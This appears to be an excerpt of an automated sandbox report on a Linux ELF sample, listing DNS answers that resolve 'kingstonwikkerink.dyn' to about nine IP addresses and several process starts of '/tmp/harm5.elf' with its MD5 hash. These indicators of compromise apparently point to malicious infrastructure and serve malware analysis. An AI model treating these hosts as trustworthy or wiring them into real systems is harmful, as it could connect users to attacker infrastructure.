                                                                                      Nov 1, 2024 08:49:08.413713932 CET152.53.15.127192.168.2.230xd151No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:08.413713932 CET152.53.15.127192.168.2.230xd151No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:08.413713932 CET152.53.15.127192.168.2.230xd151No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:08.413713932 CET152.53.15.127192.168.2.230xd151No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:08.413713932 CET152.53.15.127192.168.2.230xd151No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:08.413713932 CET152.53.15.127192.168.2.230xd151No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:08.413713932 CET152.53.15.127192.168.2.230xd151No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:08.413713932 CET152.53.15.127192.168.2.230xd151No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.384902954 CET152.53.15.127192.168.2.230x9421No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.384902954 CET152.53.15.127192.168.2.230x9421No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.384902954 CET152.53.15.127192.168.2.230x9421No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.384902954 CET152.53.15.127192.168.2.230x9421No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.384902954 CET152.53.15.127192.168.2.230x9421No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.384902954 CET152.53.15.127192.168.2.230x9421No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.384902954 CET152.53.15.127192.168.2.230x9421No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.384902954 CET152.53.15.127192.168.2.230x9421No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:24.384902954 CET152.53.15.127192.168.2.230x9421No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.455372095 CET185.181.61.24192.168.2.230x1288No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.455372095 CET185.181.61.24192.168.2.230x1288No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.455372095 CET185.181.61.24192.168.2.230x1288No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.455372095 CET185.181.61.24192.168.2.230x1288No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.455372095 CET185.181.61.24192.168.2.230x1288No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.455372095 CET185.181.61.24192.168.2.230x1288No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.455372095 CET185.181.61.24192.168.2.230x1288No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.455372095 CET185.181.61.24192.168.2.230x1288No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:35.455372095 CET185.181.61.24192.168.2.230x1288No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.836503029 CET51.158.108.203192.168.2.230xf703No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.836503029 CET51.158.108.203192.168.2.230xf703No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.836503029 CET51.158.108.203192.168.2.230xf703No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.836503029 CET51.158.108.203192.168.2.230xf703No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.836503029 CET51.158.108.203192.168.2.230xf703No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.836503029 CET51.158.108.203192.168.2.230xf703No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.836503029 CET51.158.108.203192.168.2.230xf703No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.836503029 CET51.158.108.203192.168.2.230xf703No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:41.836503029 CET51.158.108.203192.168.2.230xf703No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.882540941 CET51.158.108.203192.168.2.230x1139No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.882540941 CET51.158.108.203192.168.2.230x1139No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.882540941 CET51.158.108.203192.168.2.230x1139No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.882540941 CET51.158.108.203192.168.2.230x1139No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.882540941 CET51.158.108.203192.168.2.230x1139No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.882540941 CET51.158.108.203192.168.2.230x1139No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.882540941 CET51.158.108.203192.168.2.230x1139No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.882540941 CET51.158.108.203192.168.2.230x1139No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                      Nov 1, 2024 08:49:52.882540941 CET51.158.108.203192.168.2.230x1139No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false

                                                                                      System Behavior

                                                                                      Start time (UTC):07:47:54
                                                                                      Start date (UTC):01/11/2024
                                                                                      Path:/tmp/harm5.elf
                                                                                      Arguments:/tmp/harm5.elf
                                                                                      File size:4956856 bytes
                                                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                      Start time (UTC):07:47:54
                                                                                      Start date (UTC):01/11/2024
                                                                                      Path:/tmp/harm5.elf
                                                                                      Arguments:-
                                                                                      File size:4956856 bytes
                                                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                      Start time (UTC):07:47:54
                                                                                      Start date (UTC):01/11/2024
                                                                                      Path:/tmp/harm5.elf
                                                                                      Arguments:-
                                                                                      File size:4956856 bytes
                                                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                      Start time (UTC):07:47:54
                                                                                      Start date (UTC):01/11/2024
                                                                                      Path:/tmp/harm5.elf
                                                                                      Arguments:-
                                                                                      File size:4956856 bytes
                                                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1